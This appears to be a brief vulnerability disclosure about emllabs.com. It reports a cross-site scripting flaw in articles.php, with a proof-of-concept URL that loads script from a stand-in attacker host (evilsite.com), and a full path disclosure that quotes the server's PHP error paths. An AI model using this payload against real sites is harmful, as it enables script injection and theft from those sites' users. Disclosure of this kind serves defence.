Emllabs.com - XSS
Emllabs.com
Effected files:
articles.php
search input box.
The search input box doesnt properally filter user input. for PoC try putting
in: [SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT]
XSS Vulnerability:
http://previous.emllabs.com/articles.php?navCur=[SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT]
Full path disclosure error:
http://previous.emllabs.com/article.php?articleId=
Warning: main(_articles//article.php): failed to open stream: No such file or
directory in /home/virtual/site479/fst/var/www/html/domain/article.php on line
53
Warning: main(_articles//article.php): failed to open stream: No such file or
directory in /home/virtual/site479/fst/var/www/html/domain/article.php on line
53
Warning: main(): Failed opening '_articles//article.php' for inclusion
(include_path='.:/php/includes:/usr/share/php:/usr/share/pear') in
/home/virtual/site479/fst/var/www/html/domain/article.php on line 53